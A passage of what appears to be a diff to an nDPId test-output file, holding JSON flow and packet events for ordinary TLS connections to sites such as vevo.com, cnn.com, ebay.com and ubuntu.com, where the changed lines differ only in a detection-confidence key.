2020","subjectDN":"CN=*.cache.vevo.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"ED:55:58:0E:19:94:FE:95:93:86:88:FE:30:27:DF:43:EB:74:17:C2"}} +00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482734324,"flow_last_seen":1646482734334,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482734334,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"vevo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00930{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":346,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482734324,"flow_last_seen":1646482734350,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646482734350,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"vevo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01479{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":348,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482734324,"flow_last_seen":1646482734350,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4125,"flow_avg_l4_payload_len":687,"midstream":0,"thread_ts_msec":1646482734350,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Vevo","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.2","client_requested_server_name":"vevo.com","server_names":"*.cache.vevo.com,*.cache.vevodev.com,*.cache.vevoprd.com,*.cache.vevostg.com,*.vevodev.com,*.vevoprd.com,*.vevostg.com,stg.vevo.ly,vevo.com,vevo.ly,vevo.pl,vevo.tv,vevoapi.com,vevocdn.com,vevolive.tv,vevosubmit.com,www.vevo.ly,www.vevo.pl,*.vevo.com,*.vevo.ly,*.vevo.pl,*.vevo.tv,*.vevoapi.com,*.vevocdn.com,*.vevolive.tv,*.vevosubmit.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.cache.vevo.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"ED:55:58:0E:19:94:FE:95:93:86:88:FE:30:27:DF:43:EB:74:17:C2"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482753482,"flow_last_seen":1646482753482,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482753482,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1646482753482,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482753482,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8SaBAAEAG1aPAqAGAFwFCT7wMAbtaGHg4AAAAAKAC+vA\/9AAAAgQFtAQCCAr10Gu5AAAAAAEDAwc="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1646482753504,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482753504,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGJkQXAUJPwKgBgAG7vAwZG5KKWhh4OaAS\/ogYMwAAAgQFtAQCCApuzQml9dBruQEDAwc="} 01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1646482753507,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482753507,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5SaJAAEAG06TAqAGAFwFCT7wMAbtaGHg5GRuSi4AYAfZqJAAAAQEICvXQa9NuzQmlFgMBAgABAAH8AwOUyHhinsfe9G2IXNgY9L7xAzZ+DjB199btap4Cw89cViDuti6QLvXTxzS8GPAI\/LqrruRicKAVDOLPOdfZnGvHHQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAQAA4AAAtjZG4uY25uLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACCyATmKdF69bnRwMVBRd98tu612XdMkfb0+p4HzFN6fBwAXAEEE+SEvSVfUiTeIP8IKKsjphsMZuVwTWztloapho\/r89Lhgv68xO7BDbwW8nmN\/dVf8z\/v3pQVdFakWyi7cuNIpiwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482753482,"flow_last_seen":1646482753507,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482753507,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.CNN","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.cnn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00918{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":354,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482753482,"flow_last_seen":1646482753526,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482753526,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.CNN","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.cnn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482753482,"flow_last_seen":1646482753507,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482753507,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.CNN","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.cnn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00918{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":354,"source":"sites.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482753482,"flow_last_seen":1646482753526,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482753526,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.66.79","src_port":48140,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.CNN","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.cnn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482759960,"flow_last_seen":1646482759960,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482759960,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1646482759960,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482759960,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8N8NAAEAGsY7AqAGAAhGNMZ+AAbsz0CpkAAAAAKAC+vAbqAAAAgQFtAQCCApTrIzgAAAAAAEDAwc="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":356,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1646482759979,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482759979,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgG8VECEY0xwKgBgAG7n4Axx0rTM9AqZaAS\/ogIXwAAAgQFtAQCCAq1xN1AU6yM4AEDAwc="} 01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1646482759982,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482759982,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5N8VAAEAGr4\/AqAGAAhGNMZ+AAbsz0CplMcdK1IAYAfb4fgAAAQEIClOsjPe1xN1AFgMBAgABAAH8AwO90p\/YrOJd\/Z4tss7jqktThIJxJIB3e+qrLLFobtKKlyAX6YhgDO5LSOYTxZN2IGu+QsQ1WdlQy7VgjD2lE+VvBgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAARAA8AAAx3d3cuZWJheS5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAgf8Mv24G6SSqxNEfrqm7W\/bejLWA6OGSZmHTWefPpxiwAFwBBBD+GtRBdEP9fCUeld\/IGhJTQe0q9+sY1uU3D5mNCoqM6EROqE0XBEIsVt1XPe0XwL5d6JRvhBZsY2OXTwlPA9KoAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482759960,"flow_last_seen":1646482759982,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482759982,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.eBay","breed":"Safe","category":"Shopping"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ebay.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00926{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":358,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482759960,"flow_last_seen":1646482760002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482760002,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.eBay","breed":"Safe","category":"Shopping"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.ebay.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482759960,"flow_last_seen":1646482759982,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482759982,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.eBay","breed":"Safe","category":"Shopping"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ebay.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00926{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":358,"source":"sites.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482759960,"flow_last_seen":1646482760002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482760002,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.49","src_port":40832,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.eBay","breed":"Safe","category":"Shopping"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.ebay.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482772264,"flow_last_seen":1646482772264,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482772264,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1646482772264,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482772264,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8SfdAAEAGtwnAqAGAuX2+FaeEAbviQ3M+AAAAAKAC+vAD2AAAAgQFtAQCCAo3btlLAAAAAAEDAwc="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1646482772292,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482772292,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADcGCgG5fb4VwKgBgAG7p4RVAzgX4kNzP6AS\/ogvJwAAAgQFtAQCCAoh0SIcN27ZSwEDAwc="} 01167{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1646482772294,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482772294,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5SflAAEAGtQrAqAGAuX2+FaeEAbviQ3M\/VQM4GIAYAfaY1QAAAQEICjdu2Woh0SIcFgMBAgABAAH8AwMB8bRCQdqcx9fui+mF7VjuHN5SBb79arjGU4qYGthMOSBbTABCg135wJeFEPl+a8Oxzav9AsC9J9+l+IIaNAxYkQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABFhc3NldHMudWJ1bnR1LmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACCezVQBlUDf2SIx8m1xehLWY9pQKyvfH068Wwzre\/JcNwAXAEEEo09VNt2RkHEqlhHBw1nk6JbOlFIOJqgyxElu\/vwC+3XCJEwr43v+9rwXwcTyZXa+qtiIur9f6O0kVe2u0AJzEQArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482772264,"flow_last_seen":1646482772294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482772294,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.UbuntuONE","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.ubuntu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00942{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":362,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482772264,"flow_last_seen":1646482772325,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482772325,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.UbuntuONE","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.3","client_requested_server_name":"assets.ubuntu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482772264,"flow_last_seen":1646482772294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482772294,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.UbuntuONE","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.ubuntu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00942{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":362,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482772264,"flow_last_seen":1646482772325,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482772325,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.UbuntuONE","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.3","client_requested_server_name":"assets.ubuntu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":363,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482785304,"flow_last_seen":1646482785304,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482785304,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1646482785304,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482785304,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8c2NAAEAG\/FHAqAGAX4OpW8gwAbszoGaBAAAAAKAC+vB9ogAAAgQFtAQCCArCJt4xAAAAAAEDAwc="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1646482785347,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482785347,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADIGfbVfg6lbwKgBgAG7yDD0fDnYM6BmgqASOJCOBAAAAgQFtAQCCAoi\/WCZwibeMQEDAwk="} 